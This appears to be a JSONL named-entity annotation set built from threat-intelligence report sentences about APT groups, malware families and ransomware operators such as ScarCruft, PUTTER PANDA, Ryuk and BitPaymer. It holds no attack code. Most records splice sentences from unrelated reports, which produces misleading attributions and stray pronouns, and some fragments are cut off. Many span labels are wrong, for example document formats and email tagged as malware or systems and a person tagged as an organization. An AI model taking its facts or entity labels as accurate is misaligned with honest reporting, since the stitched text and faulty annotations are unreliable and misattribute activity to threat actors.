{"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . The Sogu gang use a custom developed threat \u2013 Backdoor.Sogu , whereas the group described in this document use an off the shelf threat \u2013 Poison Ivy .", "spans": [{"start": 29, "end": 64, "label": "System"}, {"start": 131, "end": 148, "label": "Vulnerability"}, {"start": 371, "end": 384, "label": "Malware"}, {"start": 462, "end": 472, "label": "Malware"}]}
{"text": "This signals just how long ago the Poseidon threat actor was already working on its offensive framework . The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails .", "spans": [{"start": 35, "end": 56, "label": "Organization"}, {"start": 140, "end": 143, "label": "Malware"}, {"start": 148, "end": 157, "label": "Malware"}, {"start": 186, "end": 192, "label": "System"}]}
{"text": "However , Poseidon 's practice of being a ' custom-tailored malware implants boutique ' kept security researchers from connecting different campaigns under the umbrella of a single threat actor . These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 181, "end": 193, "label": "Organization"}, {"start": 234, "end": 250, "label": "Organization"}, {"start": 318, "end": 339, "label": "Organization"}, {"start": 346, "end": 372, "label": "Organization"}, {"start": 421, "end": 430, "label": "Organization"}, {"start": 442, "end": 468, "label": "Organization"}]}
{"text": "Poseidon Group is dedicated to running targeted attacks campaigns to aggressively collect information from company networks through the use of spear-phishing packaged with embedded , executable elements inside office documents and extensive lateral movement tools . Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 299, "end": 314, "label": "Organization"}]}
{"text": "The Poseidon Group is a long-running team operating on all domains : land , air , and sea . This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 128, "end": 143, "label": "Organization"}]}
{"text": "The Poseidon Group has been active , using custom code and evolving their toolkit since at least 2005 . These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 43, "end": 54, "label": "System"}]}
{"text": "Poseidon has maintained a consistently evolving toolkit since the mid-2000s . The attackers try to lure targets through spear phishing emails that include compressed executables .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 135, "end": 141, "label": "System"}]}
{"text": "The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives . We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 275, "end": 286, "label": "Organization"}, {"start": 291, "end": 318, "label": "Organization"}]}
{"text": "PROMETHIUM is an activity group that has been active as early as 2012 . Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 17, "end": 31, "label": "Organization"}, {"start": 82, "end": 108, "label": "Organization"}, {"start": 111, "end": 114, "label": "Organization"}]}
{"text": "This malware family is known as \" PittyTiger \" by the anti-virus community . Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments .", "spans": [{"start": 34, "end": 44, "label": "Organization"}, {"start": 54, "end": 74, "label": "Organization"}, {"start": 142, "end": 152, "label": "Organization"}, {"start": 155, "end": 168, "label": "Organization"}, {"start": 173, "end": 198, "label": "Organization"}, {"start": 201, "end": 214, "label": "Organization"}]}
{"text": "NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird . The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People 's Republics .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 16, "end": 30, "label": "Organization"}, {"start": 83, "end": 92, "label": "Organization"}, {"start": 96, "end": 104, "label": "System"}, {"start": 219, "end": 246, "label": "Organization"}]}
{"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions \u2014 often including military installations , intelligence agencies , and other government bodies . The attacks appear to be geopolitically motivated and target high profile organizations .", "spans": [{"start": 107, "end": 113, "label": "Organization"}, {"start": 127, "end": 136, "label": "Organization"}, {"start": 141, "end": 149, "label": "Organization"}, {"start": 247, "end": 267, "label": "Organization"}, {"start": 272, "end": 284, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 328, "end": 349, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}, {"start": 443, "end": 469, "label": "Organization"}]}
{"text": "PROMETHIUM distributed links through instant messengers , pointing recipients to malicious documents that invoked the exploit code to launch Truvasys on victim computers . The objective of the attacks is clearly espionage \u2013 they involve gaining access to top legislative , executive and judicial bodies around the world .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 141, "end": 149, "label": "System"}]}
{"text": "PROMETHIUM is an activity group that has been active since at least 2012 . The attackers have targeted a large number of organizations globally since early 2017 , with the main focus on the Middle East and North Africa ( MENA ) , especially Palestine .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 17, "end": 31, "label": "Organization"}]}
{"text": "In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched . The attacks were initially discovered while investigating a phishing attack that targeted political figures in the MENA region .", "spans": [{"start": 37, "end": 42, "label": "Organization"}, {"start": 101, "end": 114, "label": "Vulnerability"}, {"start": 298, "end": 307, "label": "Organization"}]}
{"text": "Truvasys is a collection of modules written in the Delphi programming language , a variant of Pascal . Like BlackEnergy ( a.k.a. Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 94, "end": 100, "label": "System"}, {"start": 108, "end": 119, "label": "Malware"}, {"start": 129, "end": 137, "label": "Organization"}, {"start": 140, "end": 147, "label": "Organization"}, {"start": 152, "end": 157, "label": "Malware"}]}
{"text": "While studying Truvasys , Microsoft uncovered a previously undocumented piece of malware known as Myntor that is a completely separate malware family . The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives .", "spans": [{"start": 15, "end": 23, "label": "System"}, {"start": 26, "end": 35, "label": "Organization"}, {"start": 98, "end": 104, "label": "System"}, {"start": 188, "end": 193, "label": "Malware"}]}
{"text": "Unit 61486 is the 12th Bureau of the PLA 's 3rd General Staff Department ( GSD ) and is headquartered in Shanghai , China . The first Potao campaign that we examined took place in August 2011 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}]}
{"text": "The CrowdStrike has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 . In March 2014 , the gang behind Potao started using a new infection vector .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 87, "end": 99, "label": "Organization"}, {"start": 184, "end": 189, "label": "Malware"}, {"start": 210, "end": 226, "label": "Malware"}]}
{"text": "The CrowdStrike Intelligence team has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 . Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies .", "spans": [{"start": 4, "end": 28, "label": "Organization"}, {"start": 105, "end": 117, "label": "Organization"}, {"start": 189, "end": 193, "label": "Organization"}, {"start": 207, "end": 212, "label": "Malware"}, {"start": 275, "end": 285, "label": "Organization"}, {"start": 290, "end": 307, "label": "Organization"}, {"start": 339, "end": 352, "label": "Organization"}]}
{"text": "This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries . As confirmation that the malware writers are still very active even at the time of this writing , ESET detected a new Potao sample compiled on July 20 , 2015 .", "spans": [{"start": 166, "end": 175, "label": "Organization"}, {"start": 180, "end": 204, "label": "Organization"}, {"start": 305, "end": 309, "label": "Organization"}, {"start": 325, "end": 337, "label": "Malware"}]}
{"text": "Parts of the PUTTER PANDA toolset and tradecraft have been previously documented , both by CrowdStrike , and in open source , where they are referred to as the MSUpdater group . In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of Win32/Potao and Win32/FakeTC samples .", "spans": [{"start": 13, "end": 25, "label": "Organization"}, {"start": 91, "end": 102, "label": "Organization"}, {"start": 160, "end": 175, "label": "Organization"}, {"start": 240, "end": 244, "label": "Organization"}, {"start": 285, "end": 296, "label": "Malware"}, {"start": 301, "end": 321, "label": "Malware"}]}
{"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 39, "end": 44, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 119, "end": 126, "label": "Organization"}, {"start": 129, "end": 137, "label": "Organization"}, {"start": 144, "end": 162, "label": "Organization"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 255, "end": 275, "label": "Organization"}, {"start": 278, "end": 283, "label": "Malware"}, {"start": 408, "end": 415, "label": "Malware"}]}
{"text": "According to the hacking collective , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks . Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the Trojan .", "spans": [{"start": 217, "end": 222, "label": "Malware"}, {"start": 521, "end": 527, "label": "Malware"}]}
{"text": "The folders seem to contain information about the company 's development documentation , artificial intelligence model , web security software , and antivirus software base code . The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 20, "end": 39, "label": "Malware"}, {"start": 184, "end": 196, "label": "Organization"}]}
{"text": "Targeting antivirus companies appears to have been the primary goal of Fxmps' latest network intrusions . The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": [{"start": 10, "end": 29, "label": "Organization"}, {"start": 110, "end": 122, "label": "Organization"}, {"start": 161, "end": 165, "label": "Malware"}]}
{"text": "This period started with their seeming disappearance in October 2018 and concluded with their return in April 2019 . he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": [{"start": 120, "end": 126, "label": "Organization"}, {"start": 171, "end": 175, "label": "Malware"}]}
{"text": "The hacker 's name is Gnosticplayers , and since February 11 the hacker has put up for sale data for 32 companies in three rounds [stories on Round 1 , Round 2 , and Round 3] on Dream Market , a dark web marketplace . PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release .", "spans": [{"start": 218, "end": 224, "label": "Organization"}, {"start": 307, "end": 311, "label": "Malware"}, {"start": 317, "end": 324, "label": "Malware"}, {"start": 329, "end": 338, "label": "Malware"}]}
{"text": "But according to Gnosticplayers , his foray into a public marketplace like Dream has two goals --besides the first and obvious one being money . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": [{"start": 145, "end": 150, "label": "Organization"}, {"start": 169, "end": 183, "label": "Malware"}, {"start": 244, "end": 247, "label": "Malware"}, {"start": 255, "end": 262, "label": "Malware"}]}
{"text": "Data collected by Secureworks incident response ( IR ) analysts and analyzed by CTU researchers indicates that GOLD LOWELL extorts money from victims using the custom SamSam ransomware . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": [{"start": 18, "end": 29, "label": "Organization"}, {"start": 80, "end": 83, "label": "Organization"}, {"start": 111, "end": 122, "label": "Organization"}, {"start": 167, "end": 173, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 211, "end": 225, "label": "Malware"}, {"start": 286, "end": 289, "label": "Malware"}, {"start": 297, "end": 304, "label": "Malware"}]}
{"text": "Some sources claimed that GOLD LOWELL operations specifically targeted the healthcare vertical following public SamSam incidents in 2016 and 2018 . The first new connection SPEAR identified was derived from an email address listed in Blue Coat Systems' original report on PassCV .", "spans": [{"start": 26, "end": 37, "label": "Organization"}, {"start": 75, "end": 85, "label": "Organization"}, {"start": 112, "end": 118, "label": "System"}, {"start": 173, "end": 178, "label": "Organization"}, {"start": 210, "end": 215, "label": "System"}, {"start": 272, "end": 278, "label": "Organization"}]}
{"text": "However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform .", "spans": [{"start": 10, "end": 13, "label": "Organization"}, {"start": 38, "end": 49, "label": "Organization"}, {"start": 214, "end": 221, "label": "Organization"}]}
{"text": "In January 2017 , GOLD LOWELL began targeting legitimate RDP account credentials , in some cases discovering and compromising accounts using brute-force techniques . The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations .", "spans": [{"start": 57, "end": 60, "label": "System"}, {"start": 170, "end": 176, "label": "Organization"}, {"start": 256, "end": 270, "label": "Organization"}]}
{"text": "In 2015 and 2016 , GOLD LOWELL frequently exploited JBoss enterprise applications using several versions of this open-source JBoss exploitation tool . Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia .", "spans": [{"start": 52, "end": 57, "label": "System"}, {"start": 125, "end": 130, "label": "System"}, {"start": 175, "end": 181, "label": "Organization"}]}
{"text": "In 2017 and early 2018 , the group used PowerShell commands to call Mimikatz from an online PowerSploit repository , which is a collection of publicly available PowerShell modules for penetration testing . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December .", "spans": [{"start": 40, "end": 59, "label": "System"}, {"start": 68, "end": 76, "label": "System"}, {"start": 161, "end": 179, "label": "System"}, {"start": 235, "end": 263, "label": "Organization"}]}
{"text": "Gold Lowell responded by modifying a registry entry to disable the endpoint tool 's scanning functionality . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 113, "end": 118, "label": "Indicator"}, {"start": 119, "end": 126, "label": "Vulnerability"}, {"start": 142, "end": 158, "label": "System"}, {"start": 175, "end": 188, "label": "Vulnerability"}]}
{"text": "Gold Lowell then provide a download link to a unique XML executable file and corresponding RSA private key to decrypt the files . BBSRAT is typically packaged within a portable executable file , although in a few of the observed instances , a raw DLL was discovered to contain BBSRAT .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 53, "end": 72, "label": "System"}, {"start": 91, "end": 94, "label": "System"}, {"start": 130, "end": 136, "label": "Malware"}, {"start": 247, "end": 250, "label": "System"}, {"start": 277, "end": 283, "label": "Malware"}]}
{"text": "This methodology , known as \" big game hunting \" , signals a shift in operations for WIZARD SPIDER , a criminal enterprise of which GRIM SPIDER appears to be a cell . WildFire properly classifies BBSRAT malware samples as malicious .", "spans": [{"start": 167, "end": 175, "label": "Organization"}, {"start": 196, "end": 218, "label": "Malware"}]}
{"text": "The WIZARD SPIDER threat group , known as the Russia-based operator of the TrickBot banking malware , had focused primarily on wire fraud in the past . This week we will discuss another Chinese nexus adversary we call Samurai Panda .", "spans": [{"start": 4, "end": 30, "label": "Organization"}, {"start": 75, "end": 99, "label": "System"}]}
{"text": "Similar to Samas and BitPaymer , Ryuk is specifically used to target enterprise environments . Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims .", "spans": [{"start": 11, "end": 16, "label": "System"}, {"start": 21, "end": 30, "label": "System"}, {"start": 33, "end": 37, "label": "System"}, {"start": 95, "end": 108, "label": "Organization"}]}
{"text": "Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release . Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": [{"start": 36, "end": 40, "label": "System"}, {"start": 45, "end": 62, "label": "System"}, {"start": 78, "end": 82, "label": "System"}, {"start": 104, "end": 110, "label": "System"}, {"start": 247, "end": 258, "label": "Organization"}]}
{"text": "Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors . Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": [{"start": 0, "end": 6, "label": "System"}]}
{"text": "However , Ryuk is only used by GRIM SPIDER and , unlike Hermes , Ryuk has only been used to target enterprise environments . Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes .", "spans": [{"start": 10, "end": 14, "label": "System"}, {"start": 56, "end": 62, "label": "System"}, {"start": 65, "end": 69, "label": "System"}]}
{"text": "Since Ryuk 's appearance in August , the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD . These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets .", "spans": [{"start": 6, "end": 10, "label": "System"}]}
{"text": "Hermes ransomware , the predecessor to Ryuk , was first distributed in February 2017 . When conducting programmatic espionage activity , it can presumably become quite confusing if the attacker targets a heavy industry company , an avionics program , and seven other unique targets as to which infected host you will collect what information from .", "spans": [{"start": 0, "end": 17, "label": "System"}, {"start": 39, "end": 43, "label": "System"}, {"start": 204, "end": 226, "label": "Organization"}]}
{"text": "In mid-August 2018 , a modified version of Hermes , dubbed Ryuk , started appearing in a public malware repository . These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module .", "spans": [{"start": 43, "end": 49, "label": "System"}, {"start": 59, "end": 63, "label": "System"}, {"start": 150, "end": 159, "label": "Malware"}, {"start": 169, "end": 195, "label": "Malware"}]}
{"text": "Ryuk was tailored to target enterprise environments and some of the modifications include removing anti-analysis checks . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 143, "end": 153, "label": "Organization"}, {"start": 183, "end": 191, "label": "Vulnerability"}, {"start": 192, "end": 210, "label": "System"}]}
{"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files . Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" .", "spans": [{"start": 20, "end": 26, "label": "System"}, {"start": 30, "end": 34, "label": "System"}, {"start": 45, "end": 49, "label": "System"}, {"start": 84, "end": 87, "label": "System"}, {"start": 107, "end": 110, "label": "System"}, {"start": 127, "end": 140, "label": "Malware"}, {"start": 143, "end": 153, "label": "Organization"}, {"start": 233, "end": 242, "label": "Organization"}]}
{"text": "For each mounted drive , Ryuk calls GetDriveTypeW to determine the drive 's type . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": [{"start": 25, "end": 29, "label": "System"}, {"start": 36, "end": 49, "label": "System"}, {"start": 83, "end": 92, "label": "Organization"}]}
{"text": "To retrieve IP addresses that have ARP entries , Ryuk calls GetIpNetTable . ScarCruft has several ongoing operations , utilizing multiple exploits \u2014 two for Adobe Flash and one for Microsoft Internet Explorer .", "spans": [{"start": 49, "end": 53, "label": "System"}, {"start": 60, "end": 73, "label": "System"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 157, "end": 168, "label": "Malware"}, {"start": 181, "end": 208, "label": "Malware"}]}
{"text": "Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA ( activities of which have been public reported as part of the \" Lazarus Group \" ) , because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017 . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": [{"start": 43, "end": 60, "label": "System"}, {"start": 212, "end": 218, "label": "System"}, {"start": 296, "end": 305, "label": "Organization"}]}
{"text": "The two executables related to Hermes are bitsran.exe and RSW7B37.tmp . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 42, "end": 53, "label": "Malware"}, {"start": 58, "end": 69, "label": "Malware"}, {"start": 183, "end": 188, "label": "Vulnerability"}, {"start": 191, "end": 209, "label": "System"}, {"start": 210, "end": 217, "label": "Vulnerability"}]}
{"text": "Falcon Intelligence has medium-high confidence that the GRIM SPIDER threat actors are operating out of Russia . Adobe Flash Player exploit .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 112, "end": 130, "label": "System"}, {"start": 131, "end": 138, "label": "Vulnerability"}]}
{"text": "Based on these factors , there is considerably more evidence supporting the hypothesis that the GRIM SPIDER threat actors are Russian speakers and not North Korean . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April .", "spans": [{"start": 191, "end": 200, "label": "Organization"}, {"start": 218, "end": 226, "label": "Vulnerability"}, {"start": 227, "end": 234, "label": "Vulnerability"}, {"start": 237, "end": 250, "label": "Vulnerability"}]}
{"text": "The hackers also started tweeting a few samples of internal emails from the company . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": [{"start": 121, "end": 133, "label": "System"}, {"start": 134, "end": 141, "label": "Vulnerability"}, {"start": 144, "end": 157, "label": "Vulnerability"}]}
{"text": "From a process and file perspective , Hermes and Ryuk target files in a similar fashion . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": [{"start": 38, "end": 44, "label": "System"}, {"start": 49, "end": 53, "label": "System"}, {"start": 90, "end": 99, "label": "Organization"}, {"start": 138, "end": 150, "label": "System"}, {"start": 151, "end": 158, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}]}
{"text": "Claudio Guarnieri , a security researcher who has investigated Hacking Team along with others at the Citizen Lab , was quick to point this out . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 101, "end": 112, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}, {"start": 237, "end": 245, "label": "Vulnerability"}]}
{"text": "The breach on Hacking Team comes almost a year after another surveillance tech company , the competing FinFisher , was hacked in a similar way , with a hacker leaking 40 Gb of internal files . After publishing our initial series of blogposts back in 2016 , Kaspersky have continued to track the ScarCruft threat actor .", "spans": [{"start": 103, "end": 112, "label": "Organization"}, {"start": 257, "end": 266, "label": "Organization"}, {"start": 295, "end": 304, "label": "Organization"}]}
{"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails . After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor .", "spans": [{"start": 103, "end": 139, "label": "Malware"}]}
{"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": [{"start": 19, "end": 25, "label": "System"}, {"start": 62, "end": 69, "label": "Organization"}, {"start": 152, "end": 165, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}]}
{"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) .", "spans": [{"start": 56, "end": 65, "label": "System"}, {"start": 108, "end": 131, "label": "Organization"}, {"start": 134, "end": 137, "label": "Organization"}, {"start": 215, "end": 230, "label": "Organization"}]}
{"text": "The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": [{"start": 94, "end": 103, "label": "System"}, {"start": 163, "end": 172, "label": "Organization"}]}
{"text": "Though the encryption and ransom functionality of BitPaymer was not technically sophisticated , the malware contained multiple anti-analysis features that overlapped with Dridex . ScarCruft uses a multi-stage binary infection scheme .", "spans": [{"start": 50, "end": 59, "label": "System"}, {"start": 171, "end": 177, "label": "System"}, {"start": 180, "end": 189, "label": "Organization"}]}
{"text": "Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER , suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges .", "spans": [{"start": 28, "end": 37, "label": "System"}, {"start": 78, "end": 91, "label": "Organization"}, {"start": 251, "end": 258, "label": "Malware"}, {"start": 272, "end": 279, "label": "System"}]}
{"text": "The beginning of 2017 also brought a turning point in INDRIK SPIDER 's operation of Dridex . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": [{"start": 54, "end": 67, "label": "Organization"}, {"start": 84, "end": 90, "label": "System"}, {"start": 143, "end": 150, "label": "Vulnerability"}, {"start": 156, "end": 169, "label": "Vulnerability"}, {"start": 173, "end": 178, "label": "Malware"}]}
{"text": "CrowdStrike\u00ae Falcon\u00ae Intelligence\u2122 also observed a strong correlation between Dridex infections and BitPaymer ransomware . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it .", "spans": [{"start": 0, "end": 34, "label": "Organization"}, {"start": 78, "end": 84, "label": "System"}, {"start": 100, "end": 120, "label": "System"}]}
{"text": "During incidents that involved BitPaymer , Dridex was installed on the victim network prior to the deployment of the BitPaymer malware . The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload .", "spans": [{"start": 31, "end": 40, "label": "System"}, {"start": 43, "end": 49, "label": "System"}, {"start": 117, "end": 134, "label": "System"}, {"start": 141, "end": 151, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 208, "end": 210, "label": "System"}]}
{"text": "Also unusual was the observation that both Dridex and BitPaymer were spread through the victim network using lateral movement techniques traditionally associated with nation-state actors and penetration testing . The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": [{"start": 43, "end": 49, "label": "System"}, {"start": 54, "end": 63, "label": "System"}, {"start": 217, "end": 226, "label": "Organization"}]}
{"text": "The information gathered from these engagements , combined with information from prior Dridex IR engagements , provides insight into how INDRIK SPIDER deploys and operates both Dridex and BitPaymer . We also discovered an interesting piece of rare malware created by this threat actor \u2013 a Bluetooth device harvester .", "spans": [{"start": 87, "end": 96, "label": "System"}, {"start": 137, "end": 150, "label": "Organization"}, {"start": 177, "end": 183, "label": "System"}, {"start": 188, "end": 197, "label": "System"}, {"start": 248, "end": 255, "label": "Malware"}, {"start": 289, "end": 315, "label": "Indicator"}]}
{"text": "In recent BitPaymer IR engagements , Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": [{"start": 10, "end": 34, "label": "System"}, {"start": 37, "end": 56, "label": "Organization"}, {"start": 115, "end": 133, "label": "System"}, {"start": 142, "end": 160, "label": "System"}]}
{"text": "With the move to targeting select victims for high-value payouts , the INDRIK SPIDER adversary group is no longer forced to scale its operations , and now has the capacity to tailor its tooling to the victim 's environment and play a more active role in the compromise with \" hands on keyboard \" activity . ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea .", "spans": [{"start": 71, "end": 84, "label": "Organization"}, {"start": 333, "end": 350, "label": "Organization"}, {"start": 378, "end": 395, "label": "Organization"}]}
{"text": "This web hosting service provider continues to be the hosting provider of choice for the threat actors behind NetTraveler . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes .", "spans": [{"start": 5, "end": 33, "label": "Organization"}, {"start": 54, "end": 70, "label": "Organization"}, {"start": 110, "end": 121, "label": "System"}, {"start": 135, "end": 144, "label": "Organization"}, {"start": 168, "end": 180, "label": "Organization"}, {"start": 185, "end": 194, "label": "Organization"}, {"start": 199, "end": 209, "label": "Organization"}]}
{"text": "These new tactics of selectively targeting organizations for high ransomware payouts have signaled a shift in INDRIK SPIDER 's operation with a new focus on targeted , low-volume , high-return criminal activity : a type of cybercrime operation we refer to as big game hunting . ScarCruft infected this victim on September 21 , 2018 .", "spans": [{"start": 278, "end": 287, "label": "Organization"}]}
